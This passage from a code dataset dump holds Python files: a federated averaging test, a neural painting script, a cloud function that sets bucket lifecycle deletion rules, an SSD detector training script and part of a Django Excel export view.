tf.data.Dataset.from_tensor_slices({\n 'x': [[1., 2.], [3., 4.]],\n 'y': [[5.], [6.]]\n }).batch(2)\n\n federated_ds = [ds] * 3\n\n server_state = iterative_process.initialize()\n\n prev_loss = np.inf\n for _ in range(3):\n server_state, metric_outputs = iterative_process.next(\n server_state, federated_ds)\n self.assertEqual(metric_outputs.num_examples, 2 * len(federated_ds))\n self.assertLess(metric_outputs.loss, prev_loss)\n prev_loss = metric_outputs.loss\n\n @parameterized.named_parameters([\n ('functional_model',\n model_examples.build_linear_regresion_keras_functional_model),\n ('sequential_model',\n model_examples.build_linear_regresion_keras_sequential_model),\n ('subclass_model',\n model_examples.build_linear_regresion_keras_subclass_model),\n ])\n def test_orchestration_execute_from_keras(self, build_keras_model_fn):\n dummy_batch = collections.OrderedDict([\n ('x', np.zeros([1, 2], np.float32)),\n ('y', np.zeros([1, 1], np.float32)),\n ])\n\n def model_fn():\n keras_model = build_keras_model_fn(feature_dims=2)\n keras_model.compile(\n optimizer=tf.keras.optimizers.SGD(learning_rate=0.01),\n loss=tf.keras.losses.MeanSquaredError(),\n metrics=[])\n return keras_utils.from_compiled_keras_model(keras_model, dummy_batch)\n\n iterative_process = federated_averaging.build_federated_averaging_process(\n model_fn=model_fn)\n\n ds = tf.data.Dataset.from_tensor_slices({\n 'x': [[1., 2.], [3., 4.]],\n 'y': [[5.], [6.]]\n }).batch(2)\n federated_ds = [ds] * 3\n\n server_state = iterative_process.initialize()\n\n prev_loss = np.inf\n for _ in range(3):\n server_state, metrics = iterative_process.next(server_state, federated_ds)\n self.assertLess(metrics.loss, prev_loss)\n prev_loss = metrics.loss\n\n def test_execute_empty_data(self):\n iterative_process = federated_averaging.build_federated_averaging_process(\n model_fn=model_examples.TrainableLinearRegression)\n\n # Results in empty dataset with correct types and shapes.\n ds = tf.data.Dataset.from_tensor_slices({\n 'x': [[1., 2.]],\n 'y': [[5.]]\n }).batch(\n 5, drop_remainder=True)\n\n federated_ds = [ds] * 2\n\n server_state = iterative_process.initialize()\n\n first_state, metric_outputs = iterative_process.next(\n server_state, federated_ds)\n self.assertEqual(\n self.evaluate(tf.reduce_sum(first_state.model.trainable.a)) +\n self.evaluate(tf.reduce_sum(first_state.model.trainable.b)), 0)\n self.assertEqual(metric_outputs.num_examples, 0)\n self.assertTrue(tf.is_nan(metric_outputs.loss))\n\n\nif __name__ == '__main__':\n test.main()\n"} {"ext": "py", "sha": "1a2f909b91141d5fec10bc94b3f409d2e950c3dd", "content": "import argparse\r\n\r\nimport torch\r\ntorch.cuda.current_device()\r\nimport torch.optim as optim\r\n\r\nfrom painter import *\r\n\r\n# settings\r\nparser = argparse.ArgumentParser(description='STYLIZED NEURAL PAINTING')\r\nparser.add_argument('--img_path', type=str, default='./test_images/sunflowers.jpg', metavar='str',\r\n help='path to test image (default: ./test_images/sunflowers.jpg)')\r\nparser.add_argument('--renderer', type=str, default='rectangle', metavar='str',\r\n help='renderer: [watercolor, markerpen, oilpaintbrush, rectangle (default oilpaintbrush)')\r\nparser.add_argument('--canvas_color', type=str, default='black', metavar='str',\r\n help='canvas_color: [black, white] (default black)')\r\nparser.add_argument('--canvas_size', type=int, default=512, metavar='str',\r\n help='size ( max(w, h) ) of the canvas for stroke rendering')\r\nparser.add_argument('--max_m_strokes', type=int, default=500, metavar='str',\r\n help='max number of strokes (default 500)')\r\nparser.add_argument('--max_divide', type=int, default=5, metavar='N',\r\n help='divide an image up-to max_divide x max_divide patches (default 5)')\r\nparser.add_argument('--beta_L1', type=float, default=1.0,\r\n help='weight for L1 loss (default: 1.0)')\r\nparser.add_argument('--with_ot_loss', action='store_true', default=False,\r\n help='imporve the convergence by using optimal transportation loss')\r\nparser.add_argument('--beta_ot', type=float, default=0.1,\r\n help='weight for optimal transportation loss (default: 0.1)')\r\nparser.add_argument('--net_G', type=str, default='zou-fusion-net', metavar='str',\r\n help='net_G: plain-dcgan, plain-unet, huang-net, or zou-fusion-net (default: zou-fusion-net)')\r\nparser.add_argument('--renderer_checkpoint_dir', type=str, default=r'./checkpoints_G_rectangle', metavar='str',\r\n help='dir to load neu-renderer (default: ./checkpoints_G_rectangle)')\r\nparser.add_argument('--lr', type=float, default=0.005,\r\n help='learning rate for stroke searching (default: 0.005)')\r\nparser.add_argument('--output_dir', type=str, default=r'./output', metavar='str',\r\n help='dir to save painting results (default: ./output)')\r\nparser.add_argument('--disable_preview', action='store_true', default=False,\r\n help='disable cv2.imshow, for running remotely without x-display')\r\nargs = parser.parse_args()\r\n\r\n\r\n# Decide which device we want to run on\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n\r\ndef optimize_x(pt):\r\n\r\n pt._load_checkpoint()\r\n pt.net_G.eval()\r\n\r\n print('begin drawing...')\r\n\r\n PARAMS = np.zeros([1, 0, pt.rderr.d], np.float32)\r\n\r\n if pt.rderr.canvas_color == 'white':\r\n CANVAS_tmp = torch.ones([1, 3, 128, 128]).to(device)\r\n else:\r\n CANVAS_tmp = torch.zeros([1, 3, 128, 128]).to(device)\r\n\r\n for pt.m_grid in range(1, pt.max_divide + 1):\r\n\r\n pt.img_batch = utils.img2patches(pt.img_, pt.m_grid).to(device)\r\n pt.G_final_pred_canvas = CANVAS_tmp\r\n\r\n pt.initialize_params()\r\n pt.x_ctt.requires_grad = True\r\n pt.x_color.requires_grad = True\r\n pt.x_alpha.requires_grad = True\r\n utils.set_requires_grad(pt.net_G, False)\r\n\r\n pt.optimizer_x = optim.RMSprop([pt.x_ctt, pt.x_color, pt.x_alpha], lr=pt.lr, centered=True)\r\n\r\n pt.step_id = 0\r\n for pt.anchor_id in range(0, pt.m_strokes_per_block):\r\n pt.stroke_sampler(pt.anchor_id)\r\n iters_per_stroke = 20\r\n for i in range(iters_per_stroke):\r\n pt.G_pred_canvas = CANVAS_tmp\r\n\r\n # update x\r\n pt.optimizer_x.zero_grad()\r\n\r\n pt.x_ctt.data = torch.clamp(pt.x_ctt.data, 0, 1)\r\n pt.x_ctt.data[:, :, -1] = torch.clamp(pt.x_ctt.data[:, :, -1], 0, 0)\r\n pt.x_color.data = torch.clamp(pt.x_color.data, 0, 1)\r\n pt.x_alpha.data = torch.clamp(pt.x_alpha.data, 1, 1)\r\n\r\n pt._forward_pass()\r\n pt._backward_x()\r\n\r\n pt.x_ctt.data = torch.clamp(pt.x_ctt.data, 0, 1)\r\n pt.x_ctt.data[:, :, -1] = torch.clamp(pt.x_ctt.data[:, :, -1], 0, 0)\r\n pt.x_color.data = torch.clamp(pt.x_color.data, 0, 1)\r\n pt.x_alpha.data = torch.clamp(pt.x_alpha.data, 1, 1)\r\n\r\n pt._drawing_step_states()\r\n\r\n pt.optimizer_x.step()\r\n pt.step_id += 1\r\n\r\n v = pt._normalize_strokes(pt.x)\r\n PARAMS = np.concatenate([PARAMS, np.reshape(v, [1, -1, pt.rderr.d])], axis=1)\r\n CANVAS_tmp = pt._render(PARAMS)[-1]\r\n CANVAS_tmp = utils.img2patches(CANVAS_tmp, pt.m_grid + 1, to_tensor=True).to(device)\r\n\r\n pt._save_stroke_params(PARAMS)\r\n pt.final_rendered_images = pt._render(PARAMS)\r\n pt._save_rendered_images()\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n pt = ProgressivePainter(args=args)\r\n optimize_x(pt)\r\n\r\n"} {"ext": "py", "sha": "1a2f91338b1ffe8f2c40042e4495be5c90c79ac7", "content": "import base64\nimport json\nimport os\nimport sys\nimport re\nfrom logging import getLogger, StreamHandler, INFO\nfrom google.cloud import storage\n\nage = os.environ.get('LIFECYCLE_EXPIRE')\nignorePatterns = os.environ.get('IGNORE_PATTERNS')\n\nlogger = getLogger(__name__)\nhandler = StreamHandler()\nhandler.setLevel(INFO)\nlogger.setLevel(INFO)\nlogger.addHandler(handler)\nlogger.propagate = False\n\ndef get_gcs_bucket_name(pubsub_message):\n proto_payload = pubsub_message.get(u'protoPayload')\n if proto_payload is None or len(proto_payload) == 0:\n return None\n resource_name = proto_payload.get(u'resourceName')\n if resource_name is None or len(resource_name) == 0:\n return None\n return resource_name.split('/')[3]\n\ndef get_project_id(pubsub_message):\n resource = pubsub_message.get(u'resource')\n if resource is None or len(resource) == 0:\n return None\n labels = resource.get(u'labels')\n if labels is None or len(labels) == 0:\n return None\n project_id = labels.get(u'project_id')\n if project_id is None or len(project_id) == 0:\n return None\n return project_id\n\n# Add lifecycle rule which deletes object after 365 days\ndef enable_bucket_lifecycle(bucket_name):\n client = storage.Client()\n bucket = client.get_bucket(bucket_name)\n bucket.add_lifecycle_delete_rule(age=age)\n bucket.patch()\n logger.info(\"Lifecycle addition is complete.\")\n\ndef main_handler(event, context):\n pubsub_message = json.loads(base64.b64decode(event['data']).decode('utf-8'))\n bucket_name = get_gcs_bucket_name(pubsub_message)\n if bucket_name is None:\n logger.error(\"Could not get the bucket name from the event data.\")\n return\n logger.info(\"Bucket: %s\" % bucket_name)\n\n project_id = get_project_id(pubsub_message)\n if project_id is None:\n logger.warning(\"Could not get the project id from the event data.\")\n logger.info(\"Project id: %s\" % project_id)\n\n for ignorePattern in ignorePatterns.split('###'):\n try:\n if re.match(ignorePattern, bucket_name):\n logger.info(\"Since it is included in ignorePattern '%s', it does not set the life cycle.\" % ignorePattern)\n return\n except re.error as regex_error:\n logger.warning(\"The grammar expression '%s' has an error : %s\" % (ignorePattern, regex_error))\n\n enable_bucket_lifecycle(bucket_name)\n\n# debug\nif __name__ == '__main__':\n f = open(\"event_sample.json\", \"r\", encoding=\"utf-8\")\n event = json.load(f)\n f.close()\n context = ''\n age = '365'\n ignorePatterns = '.*.appspot.com###gcf-sources*'\n main_handler(event, context)\n"} {"ext": "py", "sha": "1a2f91c7e1dddad4cd9de82ccc1d958cc1266038", "content": "# Copyright 2018 Changan Wang\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# =============================================================================\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport tensorflow as tf\n\nfrom model import ssd_net_resnet34_large \nfrom dataset import dataset_common\nfrom utils import ssd_preprocessing\nfrom utils import anchor_manipulator\nfrom utils import scaffolds\n\ntf.app.flags.DEFINE_integer(\n 'num_readers', 8,\n 'The number of parallel readers that read data from the dataset.')\ntf.app.flags.DEFINE_integer(\n 'num_preprocessing_threads', 24,\n 'The number of threads used to create the batches.')\ntf.app.flags.DEFINE_integer(\n 'num_cpu_threads', 0,\n 'The number of cpu cores used to train.')\ntf.app.flags.DEFINE_float(\n 'gpu_memory_fraction', 1., 'GPU memory fraction to use.')\ntf.app.flags.DEFINE_string(\n 'data_dir', './tfrecords/',\n 'The directory where the dataset input data is stored.')\ntf.app.flags.DEFINE_integer(\n 'num_classes', 81, 'Number of classes to use in the dataset.')\ntf.app.flags.DEFINE_string(\n 'model_dir', './logs_mine_sec.ssd_resnet34_pretrain.no-bn_in_ssd_block_3*3_map/',\n 'The directory where the model will be stored.')\ntf.app.flags.DEFINE_integer(\n 'log_every_n_steps', 10,\n 'The frequency with which logs are printed.')\ntf.app.flags.DEFINE_integer(\n 'save_summary_steps', 500,\n 'The frequency with which summaries are saved, in seconds.')\ntf.app.flags.DEFINE_integer(\n 'save_checkpoints_secs', 3600,\n 'The frequency with which the model is saved, in seconds.')\ntf.app.flags.DEFINE_integer(\n 'train_image_size', 1200,\n 'The size of the input image for the model to use.')\ntf.app.flags.DEFINE_integer(\n 'train_epochs', None,\n 'The number of epochs to use for training.')\ntf.app.flags.DEFINE_integer(\n 'max_number_of_steps', 840000,\n 'The max number of steps to use for training.')\ntf.app.flags.DEFINE_integer(\n 'batch_size', 48,\n 'Batch size for training and evaluation.')\ntf.app.flags.DEFINE_string(\n 'data_format', 'channels_first',\n 'A flag to override the data format used in the model. channels_first '\n 'provides a performance boost on GPU but is not always compatible '\n 'with CPU. If left unspecified, the data format will be chosen '\n 'automatically based on whether TensorFlow was built for CPU or GPU.')\ntf.app.flags.DEFINE_float(\n 'negative_ratio', 3., 'Negative ratio in the loss function.')\ntf.app.flags.DEFINE_float(\n 'match_threshold', 0.5, 'Matching threshold in the loss function.')\ntf.app.flags.DEFINE_float(\n 'neg_threshold', 0.5, 'Matching threshold for the negtive examples in the loss function.')\ntf.app.flags.DEFINE_integer(\n 'tf_random_seed', 20180503, 'Random seed for TensorFlow initializers.')\ntf.app.flags.DEFINE_float(\n 'weight_decay', 5e-4, 'The weight decay on the model weights.')\ntf.app.flags.DEFINE_float(\n 'momentum', 0.9,\n 'The momentum for the MomentumOptimizer and RMSPropOptimizer.')\ntf.app.flags.DEFINE_float('learning_rate', 4e-3, 'Initial learning rate.')\ntf.app.flags.DEFINE_float(\n 'end_learning_rate', 0.000001,\n 'The minimal end learning rate used by a polynomial decay learning rate.')\ntf.app.flags.DEFINE_string(\n 'decay_boundaries', '6000, 26000, 40000, 60000, 79000, 795000, 815000',\n 'Learning rate decay boundaries by global_step (comma-separated list).')\ntf.app.flags.DEFINE_string(\n 'lr_decay_factors', '0.001, 0.01, 0.04, 0.001, 0.001, 0.001, 0.01, 0.001',\n 'The values of learning_rate decay factor for each segment between boundaries (comma-separated list).')\ntf.app.flags.DEFINE_string(\n 'checkpoint_path', './logs_mine_sec.ssd_resnet34_pretrain.no-bn_in_ssd_block.21.1/model.ckpt-99590',\n 'The path to a checkpoint from which to fine-tune.')\ntf.app.flags.DEFINE_string(\n 'checkpoint_model_scope', 'ssd1200',\n 'Model scope in the checkpoint. None if the same as the trained model.')\ntf.app.flags.DEFINE_string(\n 'model_scope', 'ssd1200',\n 'Model scope name used to replace the name_scope in checkpoint.')\ntf.app.flags.DEFINE_string(\n 'checkpoint_exclude_scopes', '',\n 'Comma-separated list of scopes of variables to exclude when restoring from a checkpoint.')\ntf.app.flags.DEFINE_boolean(\n 'ignore_missing_vars', True,\n 'When restoring a checkpoint would ignore missing variables.')\ntf.app.flags.DEFINE_boolean(\n 'multi_gpu', True,\n 'Whether there is GPU to use for training.')\nFLAGS = tf.app.flags.FLAGS\n\ndef validate_batch_size_for_multi_gpu(batch_size):\n \"\"\"For multi-gpu, batch-size must be a multiple of the number of\n available GPUs.\n Note that this should eventually be handled by replicate_model_fn\n directly. Multi-GPU support is currently experimental, however,\n so doing the work here until that feature is in place.\n \"\"\"\n if FLAGS.multi_gpu:\n from tensorflow.python.client import device_lib\n local_device_protos = device_lib.list_local_devices()\n num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU'])\n if not num_gpus:\n raise ValueError('Multi-GPU mode was specified, but no GPUs '\n 'were found. To use CPU, run --multi_gpu=False.')\n remainder = batch_size % num_gpus\n if remainder:\n err = ('When running with multiple GPUs, batch size '\n 'must be a multiple of the number of available GPUs. '\n 'Found {} GPUs with a batch size of {}; try --batch_size={} instead.'\n ).format(num_gpus, batch_size, batch_size - remainder)\n raise ValueError(err)\n return num_gpus\n return 0\n\ndef get_init_fn():\n return scaffolds.get_init_fn_for_scaffold(FLAGS.model_dir, FLAGS.checkpoint_path,\n FLAGS.model_scope, FLAGS.checkpoint_model_scope,\n FLAGS.checkpoint_exclude_scopes, FLAGS.ignore_missing_vars,\n name_remap=None)#{'/kernel': '/weights', '/bias': '/biases'})\nglobal_anchor_info = dict()\n\ndef input_pipeline(dataset_pattern='pascalvoc_0712_train_*', is_training=True, batch_size=FLAGS.batch_size):\n def input_fn():\n out_shape = [FLAGS.train_image_size] * 2\n anchor_creator = anchor_manipulator.AnchorCreator(out_shape,\n layers_shapes = [(50, 50), (25, 25), (13, 13), (7, 7), (3, 3), (3, 3)],\n anchor_scales = [(0.1,), (0.2,), (0.375,), (0.55,), (0.725,), (0.9,)],\n extra_anchor_scales = [(0.1414,), (0.2739,), (0.4541,), (0.6315,), (0.8078,), (0.9836,)],\n anchor_ratios = [(1., 2., .5), (1., 2., 3., .5, 0.3333), (1., 2., 3., .5, 0.3333), (1., 2., 3., .5, 0.3333), (1., 2., .5), (1., 2., .5)],\n layer_steps = [24, 48, 92, 171, 400, 400])\n all_anchors, all_num_anchors_depth, all_num_anchors_spatial = anchor_creator.get_all_anchors()\n num_anchors_per_layer = []\n for ind in range(len(all_anchors)):\n num_anchors_per_layer.append(all_num_anchors_depth[ind] * all_num_anchors_spatial[ind])\n anchor_encoder_decoder = anchor_manipulator.AnchorEncoder(allowed_borders = [1.0] * 6,\n positive_threshold = FLAGS.match_threshold,\n ignore_threshold = FLAGS.neg_threshold,\n prior_scaling=[0.1, 0.1, 0.2, 0.2])\n\n image_preprocessing_fn = lambda image_, labels_, bboxes_ : ssd_preprocessing.preprocess_image(image_, labels_, bboxes_, out_shape, is_training=is_training, data_format=FLAGS.data_format, output_rgb=False)\n anchor_encoder_fn = lambda glabels_, gbboxes_: anchor_encoder_decoder.encode_all_anchors(glabels_, gbboxes_, all_anchors, all_num_anchors_depth, all_num_anchors_spatial)\n image, _, shape, loc_targets, cls_targets, match_scores = dataset_common.slim_get_batch(FLAGS.num_classes,\n batch_size,\n ('train' if is_training else 'val'),\n os.path.join(FLAGS.data_dir, dataset_pattern),\n FLAGS.num_readers,\n FLAGS.num_preprocessing_threads,\n image_preprocessing_fn,\n anchor_encoder_fn,\n num_epochs=FLAGS.train_epochs,\n is_training=is_training)\n global global_anchor_info\n global_anchor_info = {'decode_fn': lambda pred : anchor_encoder_decoder.decode_all_anchors(pred, num_anchors_per_layer),\n 'num_anchors_per_layer': num_anchors_per_layer,\n 'all_num_anchors_depth': all_num_anchors_depth }\n return image, {'shape': shape, 'loc_targets': loc_targets, 'cls_targets': cls_targets, 'match_scores': match_scores}\n return input_fn\n\ndef modified_smooth_l1(bbox_pred, bbox_targets, bbox_inside_weights=1., bbox_outside_weights=1., sigma=1.):\n with tf.name_scope('smooth_l1', [bbox_pred, bbox_targets]):\n sigma2 = sigma * sigma\n inside_mul = tf.multiply(bbox_inside_weights, tf.subtract(bbox_pred, bbox_targets))\n smooth_l1_sign = tf.cast(tf.less(tf.abs(inside_mul), 1.0 / sigma2), tf.float32)\n smooth_l1_option1 = tf.multiply(tf.multiply(inside_mul, inside_mul), 0.5 * sigma2)\n smooth_l1_option2 = tf.subtract(tf.abs(inside_mul), 0.5 / sigma2)\n smooth_l1_result = tf.add(tf.multiply(smooth_l1_option1, smooth_l1_sign),\n tf.multiply(smooth_l1_option2, tf.abs(tf.subtract(smooth_l1_sign, 1.0))))\n outside_mul = tf.multiply(bbox_outside_weights, smooth_l1_result)\n return outside_mul\n\ndef ssd_model_fn(features, labels, mode, params):\n shape = labels['shape']\n loc_targets = labels['loc_targets']\n cls_targets = labels['cls_targets']\n match_scores = labels['match_scores']\n print('loc_targets:', loc_targets)\n print('cls_targets:', cls_targets)\n global global_anchor_info\n decode_fn = global_anchor_info['decode_fn']\n num_anchors_per_layer = global_anchor_info['num_anchors_per_layer']\n all_num_anchors_depth = global_anchor_info['all_num_anchors_depth']\n\n with tf.variable_scope(params['model_scope'], default_name=None, values=[features], reuse=tf.AUTO_REUSE):\n backbone = ssd_net_resnet34_large.Resnet34Backbone(params['data_format'])\n feature_layers = backbone.forward(features, training=(mode == tf.estimator.ModeKeys.TRAIN))\n location_pred, cls_pred = ssd_net_resnet34_large.multibox_head(feature_layers, params['num_classes'], all_num_anchors_depth, data_format=params['data_format'], strides=(3, 3))\n print(location_pred, cls_pred)\n if params['data_format'] == 'channels_first':\n cls_pred = [tf.transpose(pred, [0, 2, 3, 1]) for pred in cls_pred]\n location_pred = [tf.transpose(pred, [0, 2, 3, 1]) for pred in location_pred]\n\n cls_pred = [tf.reshape(pred, [tf.shape(features)[0], -1, params['num_classes']]) for pred in cls_pred]\n location_pred = [tf.reshape(pred, [tf.shape(features)[0], -1, 4]) for pred in location_pred]\n cls_pred = tf.concat(cls_pred, axis=1)\n location_pred = tf.concat(location_pred, axis=1)\n cls_pred = tf.reshape(cls_pred, [-1, params['num_classes']])\n location_pred = tf.reshape(location_pred, [-1, 4])\n\n with tf.device('/cpu:0'):\n with tf.control_dependencies([cls_pred, location_pred]):\n with tf.name_scope('post_forward'):\n #bboxes_pred = decode_fn(location_pred)\n bboxes_pred = tf.map_fn(lambda _preds : decode_fn(_preds),\n tf.reshape(location_pred, [tf.shape(features)[0], -1, 4]),\n dtype=[tf.float32] * len(num_anchors_per_layer), back_prop=False)\n #cls_targets = tf.Print(cls_targets, [tf.shape(bboxes_pred[0]),tf.shape(bboxes_pred[1]),tf.shape(bboxes_pred[2]),tf.shape(bboxes_pred[3])])\n bboxes_pred = [tf.reshape(preds, [-1, 4]) for preds in bboxes_pred]\n bboxes_pred = tf.concat(bboxes_pred, axis=0)\n\n flaten_cls_targets = tf.reshape(cls_targets, [-1])\n flaten_match_scores = tf.reshape(match_scores, [-1])\n flaten_loc_targets = tf.reshape(loc_targets, [-1, 4])\n\n # each positive examples has one label\n positive_mask = flaten_cls_targets > 0\n n_positives = tf.count_nonzero(positive_mask)\n\n batch_n_positives = tf.count_nonzero(cls_targets, -1)\n\n batch_negtive_mask = tf.equal(cls_targets, 0)#tf.logical_and(tf.equal(cls_targets, 0), match_scores > 0.)\n batch_n_negtives = tf.count_nonzero(batch_negtive_mask, -1)\n\n batch_n_neg_select = tf.cast(params['negative_ratio'] * tf.cast(batch_n_positives, tf.float32), tf.int32)\n batch_n_neg_select = tf.minimum(batch_n_neg_select, tf.cast(batch_n_negtives, tf.int32))\n\n # hard negative mining for classification\n predictions_for_bg = tf.nn.softmax(tf.reshape(cls_pred, [tf.shape(features)[0], -1, params['num_classes']]))[:, :, 0]\n prob_for_negtives = tf.where(batch_negtive_mask,\n 0. - predictions_for_bg,\n # ignore all the positives\n 0. - tf.ones_like(predictions_for_bg))\n topk_prob_for_bg, _ = tf.nn.top_k(prob_for_negtives, k=tf.shape(prob_for_negtives)[1])\n score_at_k = tf.gather_nd(topk_prob_for_bg, tf.stack([tf.range(tf.shape(features)[0]), batch_n_neg_select - 1], axis=-1))\n\n selected_neg_mask = prob_for_negtives >= tf.expand_dims(score_at_k, axis=-1)\n\n # include both selected negtive and all positive examples\n final_mask = tf.stop_gradient(tf.logical_or(tf.reshape(tf.logical_and(batch_negtive_mask, selected_neg_mask), [-1]), positive_mask))\n total_examples = tf.count_nonzero(final_mask)\n\n cls_pred = tf.boolean_mask(cls_pred, final_mask)\n location_pred = tf.boolean_mask(location_pred, tf.stop_gradient(positive_mask))\n flaten_cls_targets = tf.boolean_mask(tf.clip_by_value(flaten_cls_targets, 0, params['num_classes']), final_mask)\n flaten_loc_targets = tf.stop_gradient(tf.boolean_mask(flaten_loc_targets, positive_mask))\n\n predictions = {\n 'classes': tf.argmax(cls_pred, axis=-1),\n 'probabilities': tf.reduce_max(tf.nn.softmax(cls_pred, name='softmax_tensor'), axis=-1),\n 'loc_predict': bboxes_pred }\n\n cls_accuracy = tf.metrics.accuracy(flaten_cls_targets, predictions['classes'])\n metrics = {'cls_accuracy': cls_accuracy}\n\n # Create a tensor named train_accuracy for logging purposes.\n tf.identity(cls_accuracy[1], name='cls_accuracy')\n tf.summary.scalar('cls_accuracy', cls_accuracy[1])\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n #flaten_cls_targets=tf.Print(flaten_cls_targets, [flaten_loc_targets],summarize=50000)\n cross_entropy = tf.losses.sparse_softmax_cross_entropy(labels=flaten_cls_targets, logits=cls_pred) * (params['negative_ratio'] + 1.)\n # Create a tensor named cross_entropy for logging purposes.\n tf.identity(cross_entropy, name='cross_entropy_loss')\n tf.summary.scalar('cross_entropy_loss', cross_entropy)\n\n #loc_loss = tf.cond(n_positives > 0, lambda: modified_smooth_l1(location_pred, tf.stop_gradient(flaten_loc_targets), sigma=1.), lambda: tf.zeros_like(location_pred))\n loc_loss = modified_smooth_l1(location_pred, flaten_loc_targets, sigma=1.)\n #loc_loss = modified_smooth_l1(location_pred, tf.stop_gradient(gtargets))\n loc_loss = tf.reduce_mean(tf.reduce_sum(loc_loss, axis=-1), name='location_loss')\n tf.summary.scalar('location_loss', loc_loss)\n tf.losses.add_loss(loc_loss)\n\n l2_loss_vars = []\n for trainable_var in tf.trainable_variables():\n if '_bn' not in trainable_var.name:\n if 'conv4_3_scale' not in trainable_var.name:\n l2_loss_vars.append(tf.nn.l2_loss(trainable_var) * 0.1)\n else:\n l2_loss_vars.append(tf.nn.l2_loss(trainable_var) * 0.1)\n # Add weight decay to the loss. We exclude the batch norm variables because\n # doing so leads to a small improvement in accuracy.\n total_loss = tf.add(cross_entropy + loc_loss, tf.multiply(params['weight_decay'], tf.add_n(l2_loss_vars), name='l2_loss'), name='total_loss')\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n global_step = tf.train.get_or_create_global_step()\n lr_values = [params['learning_rate'] * decay for decay in params['lr_decay_factors']]\n learning_rate = tf.train.piecewise_constant(tf.cast(global_step, tf.int32),\n [int(_) for _ in params['decay_boundaries']],\n lr_values)\n truncated_learning_rate = tf.maximum(learning_rate, tf.constant(params['end_learning_rate'], dtype=learning_rate.dtype), name='learning_rate')\n # Create a tensor named learning_rate for logging purposes.\n tf.summary.scalar('learning_rate', truncated_learning_rate)\n optimizer = tf.train.MomentumOptimizer(learning_rate=truncated_learning_rate,\n momentum=params['momentum'])\n optimizer = tf.contrib.estimator.TowerOptimizer(optimizer)\n # Batch norm requires update_ops to be added as a train_op dependency.\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n train_op = optimizer.minimize(total_loss, global_step)\n else:\n train_op = None\n\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions,\n loss=total_loss,\n train_op=train_op,\n eval_metric_ops=metrics,\n #scaffold=None)\n scaffold=tf.train.Scaffold(init_fn=get_init_fn()))\n\ndef parse_comma_list(args):\n return [float(s.strip()) for s in args.split(',')]\n\ndef main(_):\n os.environ['CUDA_VISIBLE_DEVICES'] = '4,5,6,7'\n #tf.set_pruning_mode()\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=FLAGS.gpu_memory_fraction)\n config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False, intra_op_parallelism_threads=FLAGS.num_cpu_threads, inter_op_parallelism_threads=FLAGS.num_cpu_threads, gpu_options=gpu_options)\n num_gpus = validate_batch_size_for_multi_gpu(FLAGS.batch_size)\n\n run_config = tf.estimator.RunConfig().replace(\n save_checkpoints_secs=FLAGS.save_checkpoints_secs).replace(\n save_checkpoints_steps=None).replace(\n save_summary_steps=FLAGS.save_summary_steps).replace(\n keep_checkpoint_max=5).replace(\n tf_random_seed=FLAGS.tf_random_seed).replace(\n log_step_count_steps=FLAGS.log_every_n_steps).replace(\n session_config=config)\n\n replicate_ssd_model_fn = tf.contrib.estimator.replicate_model_fn(ssd_model_fn, loss_reduction=tf.losses.Reduction.MEAN)\n ssd_detector = tf.estimator.Estimator(\n model_fn=replicate_ssd_model_fn, model_dir=FLAGS.model_dir, config=run_config,\n params={\n 'num_gpus': num_gpus,\n 'data_format': FLAGS.data_format,\n 'batch_size': FLAGS.batch_size,\n 'model_scope': FLAGS.model_scope,\n 'num_classes': FLAGS.num_classes,\n 'negative_ratio': FLAGS.negative_ratio,\n 'match_threshold': FLAGS.match_threshold,\n 'neg_threshold': FLAGS.neg_threshold,\n 'weight_decay': FLAGS.weight_decay,\n 'momentum': FLAGS.momentum,\n 'learning_rate': FLAGS.learning_rate,\n 'end_learning_rate': FLAGS.end_learning_rate,\n 'decay_boundaries': parse_comma_list(FLAGS.decay_boundaries),\n 'lr_decay_factors': parse_comma_list(FLAGS.lr_decay_factors),\n })\n tensors_to_log = {\n 'lr': 'learning_rate',\n 'ce': 'cross_entropy_loss',\n 'loc': 'location_loss',\n 'loss': 'total_loss',\n 'l2': 'l2_loss',\n 'acc': 'post_forward/cls_accuracy',\n }\n logging_hook = tf.train.LoggingTensorHook(tensors=tensors_to_log, every_n_iter=FLAGS.log_every_n_steps,\n formatter=lambda dicts: (', '.join(['%s=%.6f' % (k, v) for k, v in dicts.items()])))\n print('Starting a training cycle.')\n ssd_detector.train(input_fn=input_pipeline(dataset_pattern='coco_2017_train-*', is_training=True, batch_size=FLAGS.batch_size),\n hooks=[logging_hook], max_steps=FLAGS.max_number_of_steps)\nif __name__ == '__main__':\n tf.logging.set_verbosity(tf.logging.INFO)\n tf.app.run()\n"} {"ext": "py", "sha": "1a2f9248def5cb5197b1f16ae85cb555e8aac1b1", "content": "from openpyxl import Workbook\nfrom django.http import HttpResponse\nfrom openpyxl.styles import Font,Alignment\nfrom .models import *\n\ndef export_wo_xls(request,wo_id):\n\tmy_wo = work_order.objects.all().filter(id=wo_id).first()\n\tresponse = HttpResponse(\n\t\tcontent_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',\n\t)\n\tresponse['Content-Disposition'] = f'attachment; filename={my_wo} Indents.xlsx'\n\tworkbook = Workbook()\n\n\t\n\t# Get active worksheet/tab\n\tworksheet = workbook.active\n\tworksheet.title = f'{my_wo} Indents'\n\n\t# Define the titles for columns\n\tcol_dict = {\n\t\t'Indent ID':'id',\n\t\t'Description':'description',\n\t\t'Material Type':'material_type',\n\t\t'Quantity':'quantity',\n\t\t'Weight':'get_weight',\n\t\t'Unit value':'value',\n\t\t'Tax (in %)':'tax',\n\t\t'Tax Value':'tax_amount',\n\t\t'Other 